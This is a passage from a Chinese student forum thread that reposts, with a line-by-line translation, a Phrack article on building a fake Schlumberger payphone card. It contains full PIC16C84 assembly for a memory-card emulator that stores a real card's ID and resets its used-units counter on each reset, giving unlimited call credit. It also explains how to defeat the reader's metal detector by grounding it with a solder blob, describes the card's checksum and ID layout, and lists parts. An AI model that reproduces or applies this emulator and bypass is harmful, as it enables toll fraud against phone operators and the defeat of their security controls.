以编写一个自己的程序,在这个文章结尾的地方我给出了一些设计图,它们是用UUencode d 编译过的。首先,你要先找到一张你要仿真国家使用的有效卡,然后读取出它里面存储 的前12位数据。 This because I don't think it would be a good idea to publish stolen card identities in Phrack. Then you simply enter those 12 bytes of data in the proper place in my program and compile it. 这是因为,我认为在Phrack里明目张胆的张贴如果盗用电话卡是件很明智的事。其实你 只需将这12字节的数据输入到我程序的相关位置并编译它就可以了。 That's it... And since I happen to choose a version of the PIC with internal Data EEPROM, that means that the first 12 locations of the Data EEPROM should contain the card id bytes. As of today this code should work smooth and fine, but maybe you'll need to modify it later on when Schlumberger gets tired of my hack. 就是这样了。因为我选择的是带有内部EEPROM存储的PIC芯片,这就意味着在它的EEPROM里 开始的12个位置里要包含卡的标识信息。今天看来,这些代码还运转正常,但是也许 今后,当Schlumberger开始厌倦了我的hack后,你要再对它修改一下。 But since the PIC is a very fast and powerful micro-controller it might be quite hard for them to come up with a solution to this problem. Let's have a look at the PIC Software!(Note that the current version of Microchip's PICSTART 16B package is unable to program the DATA EEPROM array in the 16C84 so if you are going to use that one, use the other version of the source code which you'll find in the UUEncoded part!). 但因为PIC是一个快速的功能强大的单片机,他们对于这个问题的解决,应该很难赶上我们 。 现在来看一下PIC软件!(注意,Microchip出的最新版本的PICSTART 16B package不可以 使用16C84程序中的EEPROM数据,所以如果你要使用这个,请在文章后面的UUEncoded部分 找 其他的代码。) ..典型的汇编语言,大三 的电子系应该全学过吧,虽说不会编,看看应该没有问题吧?============================================================================== TITLE "ISO 7816 Synchronous Memory Card Emulator" LIST P=PIC16C84, R=HEX INCLUDE "PICREG.EQU" ; PIC16C84 I/O Pin Assignment List CRD_CLK equ 0 ; RB0 + RA4 = Card Clock CRD_DTA equ 0 ; RA0 = Card Data Output CRD_RST equ 1 ; RB1 = Card Reset, Low-Active CRD_WE equ 7 ; RB7 = Card Write-Enable, Hi-Active ; PIC16C84 RAM Register Assignments CRD_ID equ 0x00c ; Smartcard ID, 12 bytes FUSCNT equ 0x018 ; Fused units counter BITCNT equ 0x019 ; Bitcounter LOOPCNT equ 0x01a ; Loop Counter EE_FLAG equ 0x01b ; EEPROM Write Flag TEMP1 equ 0x01c ; Temporary Storage #1 TEMP2 equ 0x01d ; Temporary Storage #2 TEMP3 equ 0x01e ; Temporary Storage #3 TEMP4 equ 0x01f ; Temporary Storage #4 TEMP_W equ 0x02e ; Temporary W Save Address TEMP_S equ 0x02f ; Temporary STATUS Save Address org 0x2000 ; Chip ID Data dw 042,042,042,042 org 0x2007 ; Configuration Fuses dw B'00000001' org 0x2100 ; Internal Data EEPROM Memory (Card ID!!!) db 0x081,0x042,0x000,0x011,0x022,0x033 db 0x044,0x055,0x066,0x077,0x011,0x084 db 0x002 ; Default used up credits value org PIC84 ; Reset-vector goto INIT ; Jump to initialization routine org INTVEC ; Interrupt-vector push ; Save registers call INTMAIN ; Call main interrupt routine pop ; Restore registers retfie ; return from interrupt & clear flag org 0x010 ; Start address for init rout. INIT bsf STATUS,RP0 ; Access register bank 1 clrwdt ; Clear watchdog timer movlw B'11101000' ; OPTION reg. settings movwf OPTION ; Store in OPTION register movlw B'11111110' ; Set PORT A Tristate Latches movwf TRISA ; Store in PORT A tristate register movlw B'11111111' ; Set PORT B Tristate Latches movwf TRISB ; Store in PORT B tristate register bcf STATUS,RP0 ; Access register bank 0 clrf RTCC ; Clear RTCC clrf PORTA ; Clear PORTA clrf PORTB ; Clear PORTB movlw 0d ; 13 bytes to copy movwf LOOPCNT ; Store in LOOPCNT movlw 0c ; Start storing at $0c in RAM movwf FSR ; Store in FSR clrf EEADR ; Start at EEPROM Address 0 EECOPY bsf STATUS,RP0 ; Access register bank 1 bsf EECON1,RD ; Set EECON1 Read Data Flag bcf STATUS,RP0 ; Access register bank 0 movfw EEDATA ; Read one byte of EEPROM Data movwf INDIR ; Store in RAM pointed at by FSR incf FSR ; Increase FSR pointer incf EEADR ; Increase EEPROM Address Pointer decfsz LOOPCNT,1 ; Decrease LOOPCNT until it's 0 goto EECOPY ; Go and get some more bytes! bsf STATUS,RP0 ; Access register bank 1 bcf EECON1,EEIF ; Clear EEPROM Write Int. Flag bcf EECON1,WREN ; EEPROM Write Disable bcf STATUS,RP0 ; Access register bank 0 movlw B'10010000' ; Enable INT Interrupt movwf INTCON ; Store in INTCON MAIN bsf STATUS,RP0 ; Access register bank 1 btfsc EECON1,WR ; Check if EEPROM Write Flag Set goto MAIN ; Skip if EEPROM Write is Completed bcf EECON1,EEIF ; Reset Write Completion Flag bcf EECON1,WREN ; EEPROM Write Disable bcf STATUS,RP0 ; Access register bank 0 btfss EE_FLAG,LSB ; Check for EEPROM Write Flag goto MAIN ; If not set, jump back and wait some more clrf EE_FLAG ; Clear EEPROM Write Flag movlw 0c ; Units is stored in byte $0c movwf EEADR ; Store in EEPROM Address Counter movfw FUSCNT ; Get fused units counter movwf EEDATA ; Store in EEDATA bsf STATUS,RP0 ; Access register bank 1 bsf EECON1,WREN ; EEPROM Write Enable bcf INTCON,GIE ; Disable all interrupts movlw 055 ; Magic Number #1 for EEPROM Write movwf EECON2 ; Store in EECON2 movlw 0aa ; Magic Number #2 for EEPROM Write movwf EECON2 ; Store in EECON2 bsf EECON1,WR ; Execute EEPROM Write bsf INTCON,GIE ; Enable all interrupts again! bcf STATUS,RP0 ; Access register bank 0 goto MAIN ; Program main loop! INTMAIN btfsc INTCON,INTF ; Check for INT Interrupt goto INTMAIN2 ; If set, jump to INTMAIN2 movlw B'00010000' ; Enable INT Interrupt movwf INTCON ; Store in INTCON return INTMAIN2 bcf STATUS,RP0 ; Access register bank 0 bsf PORTA,CRD_DTA ; Set Data Output High btfsc PORTB,CRD_RST ; Check if reset is low goto NO_RST ; If not, skip reset sequence movfw RTCC ; Get RTCC Value movwf TEMP4 ; Store in TEMP4 clrf RTCC ; Clear RTCC movlw 055 ; Subtract $55 from TEMP4 subwf TEMP4,0 ; to check for card reset.... bnz NO_RST2 ; If not zero, jump to NO_RST movlw 02 ; Unused one has $02 in FUSCNT movwf FUSCNT ; Store full value in FUSCNT bsf EE_FLAG,LSB ; Set EEPROM Write Flag NO_RST2 bcf INTCON,INTF ; Clear INT Interrupt Flag return ; Mission Accomplished, return to sender NO_RST movfw RTCC ; Get RTCC Value movwf BITCNT ; Copy it to BITCNT movwf TEMP1 ; Copy it to TEMP1 movwf TEMP2 ; Copy it to TEMP2 movlw 060 ; Load W with $60 subwf TEMP1,0 ; Subtract $60 from TEMP1 bz CREDIT ; If it is equal to $60 bc CREDIT ; or greater, then skip to units area rrf TEMP2 ; Rotate TEMP2 one step right rrf TEMP2 ; Rotate TEMP2 one step right rrf TEMP2 ; Rotate TEMP2 one step right movlw 0f ; Load W with $f andwf TEMP2,1 ; And TEMP2 with W register movfw TEMP2 ; Load W with TEMP2 addlw 0c ; Add W with $0c movwf FSR ; Store data address in FSR movfw INDIR ; Get data byte pointed at by FSR movwf TEMP3 ; Store it in TEMP3 movlw 07 ; Load W with $07 andwf TEMP1,1 ; And TEMP1 with $07 bz NO_ROT ; If result is zero, skip shift loop ROTLOOP rlf TEMP3 ; Shift TEMP3 one step left decfsz TEMP1,1 ; Decrement TEMP1 until zero goto ROTLOOP ; If not zero, repeat until it is! NO_ROT btfss TEMP3,MSB ; Check if MSB of TEMP3 is set bcf PORTA,CRD_DTA ; Clear Data Output bcf INTCON,INTF ; Clear INT Interrupt Flag return ; Mission Accomplished, return to sender CREDIT btfss PORTB,CRD_WE ; Check if Card Write Enable is High goto NO_WRT ; Abort write operation if not... btfss PORTB,CRD_RST ; Check if Card Reset is High goto NO_WRT ; Abort write operation if not... incf FUSCNT ; Increase used-up units counter bsf EE_FLAG,LSB ; Set EEPROM Write-Flag bcf INTCON,INTF ; Clear INT Interrupt Flag return ; Mission Accomplished, return to sender NO_WRT movlw 060 ; Load W with $60 subwf BITCNT,1 ; Subtract $60 from BITCNT movfw FUSCNT ; Load W with FUSCNT subwf BITCNT,1 ; Subtract FUSCNT from BITCNT bnc FUSED ; If result is negative, unit is fused bcf PORTA,CRD_DTA ; Clear Data Output FUSED bcf INTCON,INTF ; Clear INT Interrupt Flag return ; Mission Accomplished, return to sender END ============================================================================== .. .. ============================================================================== ; PIC16Cxx Micro-controller Include File PIC54 equ 0x1ff ; PIC16C54 Reset Vector PIC55 equ 0x1ff ; PIC16C55 Reset Vector PIC56 equ 0x3ff ; PIC16C56 Reset Vector PIC57 equ 0x7ff ; PIC16C57 Reset Vector PIC71 equ 0x000 ; PIC16C71 Reset Vector PIC84 equ 0x000 ; PIC16C84 Reset Vector INTVEC equ 0x004 ; PIC16C71/84 Interrupt Vector INDIR equ 0x000 ; Indirect File Reg Address Register RTCC equ 0x001 ; Real Time Clock Counter PCL equ 0x002 ; Program Counter Low Byte STATUS equ 0x003 ; Status Register FSR equ 0x004 ; File Select Register PORTA equ 0x005 ; Port A I/O Register PORTB equ 0x006 ; Port B I/O Register PORTC equ 0x007 ; Port C I/O Register ADCON0 equ 0x008 ; PIC16C71 A/D Control Reg 0 ADRES equ 0x009 ; PIC16C71 A/D Converter Result Register EEDATA equ 0x008 ; PIC16C84 EEPROM Data Register EEADR equ 0x009 ; PIC16C84 EEPROM Address Register PCLATH equ 0x00a ; Program Counter High Bits INTCON equ 0x00b ; Interrupt Control Register TRISA equ 0x005 ; Port A I/O Direction Register TRISB equ 0x006 ; Port B I/O Direction Register TRISC equ 0x007 ; Port C I/O Direction Register ADCON1 equ 0x008 ; PIC16C71 A/D Control Reg 1 EECON1 equ 0x008 ; PIC16C84 EEPROM Control Reg. 1 EECON2 equ 0x009 ; PIC16C84 EEPROM Control Reg. 2 OPTION equ 0x001 ; Option Register MSB equ 0x007 ; Most-Significant Bit LSB equ 0x000 ; Least-Significant Bit TRUE equ 1 YES equ 1 FALSE equ 0 NO equ 0 ; Status Register (f03) Bits CARRY equ 0x000 ; Carry Bit C equ 0x000 ; Carry Bit DCARRY equ 0x001 ; Digit Carry Bit DC equ 0x001 ; Digit Carry Bit Z_BIT equ 0x002 ; Zero Bit Z equ 0x002 ; Zero Bit P_DOWN equ 0x003 ; Power Down Bit PD equ 0x003 ; Power Down Bit T_OUT equ 0x004 ; Watchdog Time-Out Bit TO equ 0x004 ; Watchdog Time-Out Bit RP0 equ 0x005 ; Register Page Select 0 RP1 equ 0x006 ; Register Page Select 1 IRP equ 0x007 ; Indirect Addressing Reg. Page Sel. ; INTCON Register (f0b) Bits RBIF equ 0x000 ; RB Port change interrupt flag INTF equ 0x001 ; INT Interrupt Flag RTIF equ 0x002 ; RTCC Overflow Interrupt Flag RBIE equ 0x003 ; RB Port Ch. Interrupt Enable INTE equ 0x004 ; INT Interrupt Enable RTIE equ 0x005 ; RTCC Overflow Int. Enable ADIE equ 0x006 ; PIC16C71 A/D Int. Enable EEIE equ 0x006 ; PIC16C84 EEPROM Write Int. Enable GIE equ 0x007 ; Global Interrupt Enable ; OPTION Register (f81) Bits PS0 equ 0x000 ; Prescaler Bit 0 PS1 equ 0x001 ; Prescaler Bit 1 PS2 equ 0x002 ; Prescaler Bit 2 PSA equ 0x003 ; Prescaler Assignment Bit RTE equ 0x004 ; RTCC Signal Edge Select RTS equ 0x005 ; RTCC Signal Source Select INTEDG equ 0x006 ; Interrupt Edge Select RBPU equ 0x007 ; Port B Pull-up Enable ; ADCON0 Register (f08) Bits ADON equ 0x000 ; A/D Converter Power Switch ADIF equ 0x001 ; A/D Conversion Interrupt Flag ADGO equ 0x002 ; A/D Conversion Start Flag CHS0 equ 0x003 ; A/D Converter Channel Select 0 CHS1 equ 0x004 ; A/D Converter Channel Select 1 ADCS0 equ 0x006 ; A/D Conversion Clock Select 0 ADCS1 equ 0x007 ; A/D Conversion Clock Select 0 ; ADCON1 Register (f88) Bits PCFG0 equ 0x000 ; RA0-RA3 Configuration Bit 0 PCFG1 equ 0x001 ; RA0-RA3 Configuration Bit 0 ; EECON1 Register (f88) Bits RD equ 0x000 ; PIC16C84 EEPROM Read Data Flag WR equ 0x001 ; PIC16C84 EEPROM Write Data Flag WREN equ 0x002 ; PIC16C84 EEPROM Write Enable Flag WRERR equ 0x003 ; PIC16C84 EEPROM Write Error Flag EEIF equ 0x004 ; PIC16C84 EEPROM Interrupt Flag ; Some useful macros... PUSH macro movwf TEMP_W swapf STATUS,W movwf TEMP_S endm POP macro swapf TEMP_S,W movwf STATUS swapf TEMP_W swapf TEMP_W,W endm END ============================================================================== |
|
|
|
4C#
发布于:2002-10-15 22:37
Re:做出自己的“上机卡”(电子系,大3以上)
The Security System:
~~~~~~~~~~~~~~~~~~~~ The security of the Schlumberger card system depends strongly on two things: the metal detector in the card reader which senses if there is any metal on the card where there shouldn't be any metal. Circuit traces on a home built card is definitively made of metal. So, we have to figure out a way of getting around this problem... Schlumberger公司的电话卡系统在安全上很大的依赖着两件事:读卡器上的金属探 测器,它会探测一下在卡上没有金属的部分是否有金属。而土制的卡,电路上最后都 是用金属完成的。因此针对这个问题,我们找到一个办法。 Well, that isn't really too hard! They made one really big mistake: If the metal detector is grounded, it doesn't work!! If you look at the printout of my layouts for this card you'll find one big area of the board that is rectangle shaped. In this area you should make a big blob of solder that is between 2-3 millimeters high (approximately!). When the card slides into the phone, the blob should be touching the metal detector and since the blob is connected to ground the detector is also being grounded. 这其实不难!他们犯了一个很大的错误:当金属感应器接地的时候,它就不能工作了。 如果你打印输出的卡片的版面图,你会发现一大块长方形的区域。在这个区域上,你应 该点上一块近似2-3毫米厚的焊锡。当卡片滑动到话机里,这个焊点就接触在金属感应 器上,因为这个焊点是接地的,所以,这样金属感应器也就接地了。 The phone also counts the number of times the metal detector gets triggered by foreign objects in the card reader (Meaning that the phone companies security staff can see if someone's attempting to use a fake card that doesn't have this counter-measure on it!) and this is of course included in the daily service report the phone sends to the central computer. 电话还要对金属探测器被外界物触发的次数进行记录(意思就是,如果有人试图使用那 些没有这种计算测量动作的“黑卡”,电话公司安全人员是可以知道的)当然这些都包括 在话机送到中心计算机的日常服务报告里。 The second security lies in the cards first 12 bytes, it's not just what it appears to be: a serial number, it's more than that. Part of the first byte is a checksum of the number of 1's in the 11 bytes following it. Then byte 2 is always $83, identifying the card as an electronic phonecard. Byte 3 and 4 is the number of units on the card: 第二道安全防御在于卡上的前12个字节,它不是看上的那样只是一个串号,它不仅仅是 这个。一部分卡的第一个字节是后面11个字节的检查和,第二个字节却总是$84,表示这 个卡是一张电子电话卡,第三和第四字节是这张卡的单元数。 The first nibble of byte 3 is always $1 and then in the remaining three nibbles the number of units is stored in BCD code, for example $11,$22 means 120 units (Two units is always fused at the factory as a test, see the text by Stephane Bausson!) Then we have 4 bytes of card serial number data, 2 bytes of card checksum (calculated with a 16 bit key stored in the payphone's ROM), 1 byte that is always $11, and then at last, byte 12 which is the country identifier. 第三个字节的第一个半位元组总是$1,剩下的三个半位元组里是以BCD码存放的单元数。 例如$11,$22就以为着120个单元(两个单元总是在出厂时作为测试被熔断了,参见 Stephane Bausson写的相关文章)。这样我们就有了4个字节的卡的串号数据,2个字节 是卡的检查和(使用在话机的ROM里存放的16位密匙计算),一个始终为$11的字节,最后 第十二字节是国家标识。 The Parts Needed: ~~~~~~~~~~~~~~~~~ 01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package) 01 * 4 MHz Ceramic Resonator, Surface Mounted 02 * 22 pF Capacitors, Surface Mounted (Size 1206). 01 * 0.8mm thick single sided circuit board with P20 photoresist The Construction: ~~~~~~~~~~~~~~~~~ Since this project is obviously not intended for the novice in electronics I will not go into the basic details of soldering/etching circuit boards. If you do not know much of this, ask a friend who does for help. If you want to reach me for help, write to Phrack and ask them to forward the letter to me as I wish to remain anonymous - This project will probably upset a lot of phone companies and last but not least the guys at Schlumberger Tech. 因为这个设计明显不是针对电子学的初学者的,所以我也不想详细的讲解如何焊接 和制版。如果你真的想多了解一些这类东西,找个朋友来制导一下吧。如果你有问题 问我,给Phrack写信,要他们转达吧,因为我我希望自己默默无闻。这个设计方案 也许会搞垮很多的电话公司。 |
|
|
|
5C#
发布于:2002-10-15 22:41
Re:做出自己的“上机卡”(电子系,大3以上)
前几天在各个BBS上乱逛的时候发现了这个文章,可惜是E文的,看的费劲异常,后来在成都理工的BBS上发现了一位仁兄贴的翻译过来的。很是感激,可是不知道是什么原因,刚到一半就突然CUT了,心里更是不爽,索性花了一个下午的时间吧整篇文档翻译了出来,小弟是第一次作这种工作,很多地方都不知道翻译的对不对,所以我做成了英汉对照的,大家看中文觉得吃力了,那就是可能我的翻译不到位,再更费力的看一看E文的原稿
吧。 第一篇就是我在成都理工看到的那篇,以后的都是我翻译的了。 有什么砖头就扔过来吧。 我觉得电子系的学生应该来看看,毕竟全市我们学过的,微机接口,汇编语言,还有程序语言,别看他们简单,古老,可是它毕竟是基础。而且学校很少给我们真正动手的项目,好不容易一个印张计数器的设计,还是永远一届抄一届的,看看新鲜的,尝试一下吧。ok?? -------------------- “人是一根脆弱却有思想的芦苇。” 一个人不思想,世上就多条愚汉; 一个民族不思想,就会走向疯狂。 思想是人与生俱来的权利,虽然它并不必然指向真理;但不思想却必然走向愚昧盲从。 因此剥夺人的思想权利就是一种罪。 |
|
|
|
6C#
发布于:2002-10-16 10:17
Re:做出自己的“上机卡”(电子系,大3以上)
too 长 ! too 麻烦!
--------------------
有情来下种,因地果还生; 无情亦无种,无性亦无生。 -------“睡教”教主! |
|
|
|
7C#
发布于:2002-10-19 12:40
Re:做出自己的“上机卡”(电子系,大3以上)
我们系理应这样,你可以交给你的微机老师让,他先我后, 这才有作学生的“风范”!!!你完可以自己作的,在我们电子科协有些是可以帮你的!!!???
--------------------
|
|
|
